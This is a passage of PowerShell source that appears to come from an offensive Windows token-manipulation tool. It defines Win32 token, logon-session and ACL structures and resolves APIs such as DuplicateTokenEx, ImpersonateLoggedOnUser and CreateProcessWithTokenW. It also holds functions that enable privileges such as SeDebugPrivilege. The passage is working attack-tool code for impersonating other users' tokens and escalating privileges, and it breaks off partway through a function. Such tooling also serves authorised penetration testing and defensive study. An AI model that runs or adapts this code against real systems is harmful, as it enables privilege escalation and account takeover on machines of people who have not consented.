$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null - $LARGE_INTEGER = $TypeBuilder.CreateType() - - #Struct LUID - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8) - $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('HighPart', [Int32], 'Public') | Out-Null - $LUID = $TypeBuilder.CreateType() - - #Struct TOKEN_STATISTICS - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_STATISTICS', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('TokenId', $LUID, 'Public') | Out-Null - $TypeBuilder.DefineField('AuthenticationId', $LUID, 'Public') | Out-Null - $TypeBuilder.DefineField('ExpirationTime', $LARGE_INTEGER, 'Public') | Out-Null - $TypeBuilder.DefineField('TokenType', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('ImpersonationLevel', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('DynamicCharged', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('DynamicAvailable', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('GroupCount', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('ModifiedId', $LUID, 'Public') | Out-Null - $TOKEN_STATISTICS = $TypeBuilder.CreateType() - - #Struct LSA_UNICODE_STRING - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('LSA_UNICODE_STRING', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('Length', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('MaximumLength', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('Buffer', [IntPtr], 'Public') | Out-Null - $LSA_UNICODE_STRING = $TypeBuilder.CreateType() - - #Struct LSA_LAST_INTER_LOGON_INFO - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('LSA_LAST_INTER_LOGON_INFO', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('LastSuccessfulLogon', $LARGE_INTEGER, 'Public') | Out-Null - $TypeBuilder.DefineField('LastFailedLogon', $LARGE_INTEGER, 'Public') | Out-Null - $TypeBuilder.DefineField('FailedAttemptCountSinceLastSuccessfulLogon', [UInt32], 'Public') | Out-Null - $LSA_LAST_INTER_LOGON_INFO = $TypeBuilder.CreateType() - - #Struct SECURITY_LOGON_SESSION_DATA - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('SECURITY_LOGON_SESSION_DATA', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('Size', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('LoginID', $LUID, 'Public') | Out-Null - $TypeBuilder.DefineField('Username', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('LoginDomain', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('AuthenticationPackage', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('LogonType', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('Session', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('Sid', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('LoginTime', $LARGE_INTEGER, 'Public') | Out-Null - $TypeBuilder.DefineField('LoginServer', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('DnsDomainName', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('Upn', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('UserFlags', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('LastLogonInfo', $LSA_LAST_INTER_LOGON_INFO, 'Public') | Out-Null - $TypeBuilder.DefineField('LogonScript', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('ProfilePath', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('HomeDirectory', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('HomeDirectoryDrive', $LSA_UNICODE_STRING, 'Public') | Out-Null - $TypeBuilder.DefineField('LogoffTime', $LARGE_INTEGER, 'Public') | Out-Null - $TypeBuilder.DefineField('KickOffTime', $LARGE_INTEGER, 'Public') | Out-Null - $TypeBuilder.DefineField('PasswordLastSet', $LARGE_INTEGER, 'Public') | Out-Null - $TypeBuilder.DefineField('PasswordCanChange', $LARGE_INTEGER, 'Public') | Out-Null - $TypeBuilder.DefineField('PasswordMustChange', $LARGE_INTEGER, 'Public') | Out-Null - $SECURITY_LOGON_SESSION_DATA = $TypeBuilder.CreateType() - - #Struct STARTUPINFO - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('STARTUPINFO', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('cb', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('lpReserved', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('lpDesktop', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('lpTitle', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('dwX', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('dwY', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('dwXSize', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('dwYSize', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('dwXCountChars', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('dwYCountChars', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('dwFillAttribute', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('wShowWindow', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('cbReserved2', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('lpReserved2', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('hStdInput', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('hStdOutput', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('hStdError', [IntPtr], 'Public') | Out-Null - $STARTUPINFO = $TypeBuilder.CreateType() - - #Struct PROCESS_INFORMATION - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('PROCESS_INFORMATION', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('hProcess', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('hThread', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('dwProcessId', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('dwThreadId', [UInt32], 'Public') | Out-Null - $PROCESS_INFORMATION = $TypeBuilder.CreateType() - - #Struct TOKEN_ELEVATION - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_ELEVATION', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('TokenIsElevated', [UInt32], 'Public') | Out-Null - $TOKEN_ELEVATION = $TypeBuilder.CreateType() - - #Struct LUID_AND_ATTRIBUTES - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12) - $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null - $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null - $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType() - - #Struct TOKEN_PRIVILEGES - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16) - $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null - $TOKEN_PRIVILEGES = $TypeBuilder.CreateType() - - #Struct ACE_HEADER - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('ACE_HEADER', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('AceType', [Byte], 'Public') | Out-Null - $TypeBuilder.DefineField('AceFlags', [Byte], 'Public') | Out-Null - $TypeBuilder.DefineField('AceSize', [UInt16], 'Public') | Out-Null - $ACE_HEADER = $TypeBuilder.CreateType() - - #Struct ACL - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('ACL', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('AclRevision', [Byte], 'Public') | Out-Null - $TypeBuilder.DefineField('Sbz1', [Byte], 'Public') | Out-Null - $TypeBuilder.DefineField('AclSize', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('AceCount', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('Sbz2', [UInt16], 'Public') | Out-Null - $ACL = $TypeBuilder.CreateType() - - #Struct ACE_HEADER - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('ACCESS_ALLOWED_ACE', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('Header', $ACE_HEADER, 'Public') | Out-Null - $TypeBuilder.DefineField('Mask', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('SidStart', [UInt32], 'Public') | Out-Null - $ACCESS_ALLOWED_ACE = $TypeBuilder.CreateType() - - #Struct TRUSTEE - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('TRUSTEE', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('pMultipleTrustee', [IntPtr], 'Public') | Out-Null - $TypeBuilder.DefineField('MultipleTrusteeOperation', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('TrusteeForm', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('TrusteeType', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('ptstrName', [IntPtr], 'Public') | Out-Null - $TRUSTEE = $TypeBuilder.CreateType() - - #Struct EXPLICIT_ACCESS - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('EXPLICIT_ACCESS', $Attributes, [System.ValueType]) - $TypeBuilder.DefineField('grfAccessPermissions', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('grfAccessMode', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('grfInheritance', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('Trustee', $TRUSTEE, 'Public') | Out-Null - $EXPLICIT_ACCESS = $TypeBuilder.CreateType() - ############################### - - - ############################### - #Win32Functions - ############################### - $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess - $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) - $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) - - $OpenProcessTokenAddr = Get-ProcAddress advapi32.dll OpenProcessToken - $OpenProcessTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([Bool]) - $OpenProcessToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessTokenAddr, $OpenProcessTokenDelegate) - - $GetTokenInformationAddr = Get-ProcAddress advapi32.dll GetTokenInformation - $GetTokenInformationDelegate = Get-DelegateType @([IntPtr], $TOKEN_INFORMATION_CLASS, [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) - $GetTokenInformation = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetTokenInformationAddr, $GetTokenInformationDelegate) - - $SetThreadTokenAddr = Get-ProcAddress advapi32.dll SetThreadToken - $SetThreadTokenDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([Bool]) - $SetThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetThreadTokenAddr, $SetThreadTokenDelegate) - - $ImpersonateLoggedOnUserAddr = Get-ProcAddress advapi32.dll ImpersonateLoggedOnUser - $ImpersonateLoggedOnUserDelegate = Get-DelegateType @([IntPtr]) ([Bool]) - $ImpersonateLoggedOnUser = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateLoggedOnUserAddr, $ImpersonateLoggedOnUserDelegate) - - $RevertToSelfAddr = Get-ProcAddress advapi32.dll RevertToSelf - $RevertToSelfDelegate = Get-DelegateType @() ([Bool]) - $RevertToSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevertToSelfAddr, $RevertToSelfDelegate) - - $LsaGetLogonSessionDataAddr = Get-ProcAddress secur32.dll LsaGetLogonSessionData - $LsaGetLogonSessionDataDelegate = Get-DelegateType @([IntPtr], [IntPtr].MakeByRefType()) ([UInt32]) - $LsaGetLogonSessionData = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaGetLogonSessionDataAddr, $LsaGetLogonSessionDataDelegate) - - $CreateProcessWithTokenWAddr = Get-ProcAddress advapi32.dll CreateProcessWithTokenW - $CreateProcessWithTokenWDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool]) - $CreateProcessWithTokenW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessWithTokenWAddr, $CreateProcessWithTokenWDelegate) - - $memsetAddr = Get-ProcAddress msvcrt.dll memset - $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr]) - $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate) - - $DuplicateTokenExAddr = Get-ProcAddress advapi32.dll DuplicateTokenEx - $DuplicateTokenExDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType()) ([Bool]) - $DuplicateTokenEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DuplicateTokenExAddr, $DuplicateTokenExDelegate) - - $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW - $LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool]) - $LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate) - - $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle - $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool]) - $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate) - - $LsaFreeReturnBufferAddr = Get-ProcAddress secur32.dll LsaFreeReturnBuffer - $LsaFreeReturnBufferDelegate = Get-DelegateType @([IntPtr]) ([UInt32]) - $LsaFreeReturnBuffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaFreeReturnBufferAddr, $LsaFreeReturnBufferDelegate) - - $OpenThreadAddr = Get-ProcAddress kernel32.dll OpenThread - $OpenThreadDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) - $OpenThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadAddr, $OpenThreadDelegate) - - $OpenThreadTokenAddr = Get-ProcAddress advapi32.dll OpenThreadToken - $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool]) - $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate) - - $CreateProcessAsUserWAddr = Get-ProcAddress advapi32.dll CreateProcessAsUserW - $CreateProcessAsUserWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool]) - $CreateProcessAsUserW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessAsUserWAddr, $CreateProcessAsUserWDelegate) - - $OpenWindowStationWAddr = Get-ProcAddress user32.dll OpenWindowStationW - $OpenWindowStationWDelegate = Get-DelegateType @([IntPtr], [Bool], [UInt32]) ([IntPtr]) - $OpenWindowStationW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenWindowStationWAddr, $OpenWindowStationWDelegate) - - $OpenDesktopAAddr = Get-ProcAddress user32.dll OpenDesktopA - $OpenDesktopADelegate = Get-DelegateType @([String], [UInt32], [Bool], [UInt32]) ([IntPtr]) - $OpenDesktopA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenDesktopAAddr, $OpenDesktopADelegate) - - $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf - $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool]) - $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate) - - $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA - $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], $LUID.MakeByRefType()) ([Bool]) - $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate) - - $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges - $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], $TOKEN_PRIVILEGES.MakeByRefType(), [UInt32], [IntPtr], [IntPtr]) ([Bool]) - $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate) - - $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread - $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr]) - $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate) - - $GetSecurityInfoAddr = Get-ProcAddress advapi32.dll GetSecurityInfo - $GetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType()) ([UInt32]) - $GetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetSecurityInfoAddr, $GetSecurityInfoDelegate) - - $SetSecurityInfoAddr = Get-ProcAddress advapi32.dll SetSecurityInfo - $SetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([UInt32]) - $SetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetSecurityInfoAddr, $SetSecurityInfoDelegate) - - $GetAceAddr = Get-ProcAddress advapi32.dll GetAce - $GetAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([IntPtr]) - $GetAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAceAddr, $GetAceDelegate) - - $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW - $LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool]) - $LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate) - - $AddAccessAllowedAceAddr = Get-ProcAddress advapi32.dll AddAccessAllowedAce - $AddAccessAllowedAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr]) ([Bool]) - $AddAccessAllowedAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AddAccessAllowedAceAddr, $AddAccessAllowedAceDelegate) - - $CreateWellKnownSidAddr = Get-ProcAddress advapi32.dll CreateWellKnownSid - $CreateWellKnownSidDelegate = Get-DelegateType @([UInt32], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool]) - $CreateWellKnownSid = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateWellKnownSidAddr, $CreateWellKnownSidDelegate) - - $SetEntriesInAclWAddr = Get-ProcAddress advapi32.dll SetEntriesInAclW - $SetEntriesInAclWDelegate = Get-DelegateType @([UInt32], $EXPLICIT_ACCESS.MakeByRefType(), [IntPtr], [IntPtr].MakeByRefType()) ([UInt32]) - $SetEntriesInAclW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetEntriesInAclWAddr, $SetEntriesInAclWDelegate) - - $LocalFreeAddr = Get-ProcAddress kernel32.dll LocalFree - $LocalFreeDelegate = Get-DelegateType @([IntPtr]) ([IntPtr]) - $LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate) - - $LookupPrivilegeNameWAddr = Get-ProcAddress advapi32.dll LookupPrivilegeNameW - $LookupPrivilegeNameWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool]) - $LookupPrivilegeNameW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeNameWAddr, $LookupPrivilegeNameWDelegate) - ############################### - - - #Used to add 64bit memory addresses - Function Add-SignedIntAsUnsigned - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Int64] - $Value1, - - [Parameter(Position = 1, Mandatory = $true)] - [Int64] - $Value2 - ) - - [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) - [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) - [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) - - if ($Value1Bytes.Count -eq $Value2Bytes.Count) - { - $CarryOver = 0 - for ($i = 0; $i -lt $Value1Bytes.Count; $i++) - { - #Add bytes - [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver - - $FinalBytes[$i] = $Sum -band 0x00FF - - if (($Sum -band 0xFF00) -eq 0x100) - { - $CarryOver = 1 - } - else - { - $CarryOver = 0 - } - } - } - else - { - Throw "Cannot add bytearrays of different sizes" - } - - return [BitConverter]::ToInt64($FinalBytes, 0) - } - - - #Enable SeAssignPrimaryTokenPrivilege, needed to query security information for desktop DACL - function Enable-SeAssignPrimaryTokenPrivilege - { - [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke() - if ($ThreadHandle -eq [IntPtr]::Zero) - { - Throw "Unable to get the handle to the current thread" - } - - [IntPtr]$ThreadToken = [IntPtr]::Zero - [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - - if ($Result -eq $false) - { - if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) - { - $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION) - if ($Result -eq $false) - { - Throw (New-Object ComponentModel.Win32Exception) - } - - $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) - if ($Result -eq $false) - { - Throw (New-Object ComponentModel.Win32Exception) - } - } - else - { - Throw ([ComponentModel.Win32Exception] $ErrorCode) - } - } - - $CloseHandle.Invoke($ThreadHandle) | Out-Null - - $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID) - $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize) - $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID) - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr) - - $Result = $LookupPrivilegeValue.Invoke($null, "SeAssignPrimaryTokenPrivilege", [Ref] $LuidObject) - - if ($Result -eq $false) - { - Throw (New-Object ComponentModel.Win32Exception) - } - - [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES) - $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize) - $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES) - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr) - - $LuidAndAttributes.Luid = $LuidObject - $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED - - [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES) - $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) - $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES) - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) - $TokenPrivileges.PrivilegeCount = 1 - $TokenPrivileges.Privileges = $LuidAndAttributes - - $Global:TokenPriv = $TokenPrivileges - - $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) - if ($Result -eq $false) - { - Throw (New-Object ComponentModel.Win32Exception) - } - - $CloseHandle.Invoke($ThreadToken) | Out-Null - } - - - #Enable SeSecurityPrivilege, needed to query security information for desktop DACL - function Enable-Privilege - { - Param( - [Parameter()] - [ValidateSet("SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeBackupPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", - "SeCreatePagefilePrivilege", "SeCreatePermanentPrivilege", "SeCreateSymbolicLinkPrivilege", "SeCreateTokenPrivilege", - "SeDebugPrivilege", "SeEnableDelegationPrivilege", "SeImpersonatePrivilege", "SeIncreaseBasePriorityPrivilege", - "SeIncreaseQuotaPrivilege", "SeIncreaseWorkingSetPrivilege", "SeLoadDriverPrivilege", "SeLockMemoryPrivilege", "SeMachineAccountPrivilege", - "SeManageVolumePrivilege", "SeProfileSingleProcessPrivilege", "SeRelabelPrivilege", "SeRemoteShutdownPrivilege", "SeRestorePrivilege", - "SeSecurityPrivilege", "SeShutdownPrivilege", "SeSyncAgentPrivilege", "SeSystemEnvironmentPrivilege", "SeSystemProfilePrivilege", - "SeSystemtimePrivilege", "SeTakeOwnershipPrivilege", "SeTcbPrivilege", "SeTimeZonePrivilege", "SeTrustedCredManAccessPrivilege", - "SeUndockPrivilege", "SeUnsolicitedInputPrivilege")] - [String] - $Privilege - ) - - [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke() - if ($ThreadHandle -eq [IntPtr]::Zero) - { - Throw "Unable to get the handle to the current thread" - } - - [IntPtr]$ThreadToken = [IntPtr]::Zero - [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - - if ($Result -eq $false) - { - if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) - { - $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION) - if ($Result -eq $false) - { - Throw (New-Object ComponentModel.Win32Exception) - } - - $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) - if ($Result -eq $false) - { - Throw (New-Object ComponentModel.Win32Exception) - } - } - else - { - Throw ([ComponentModel.Win32Exception] $ErrorCode) - } - } - - $CloseHandle.Invoke($ThreadHandle) | Out-Null 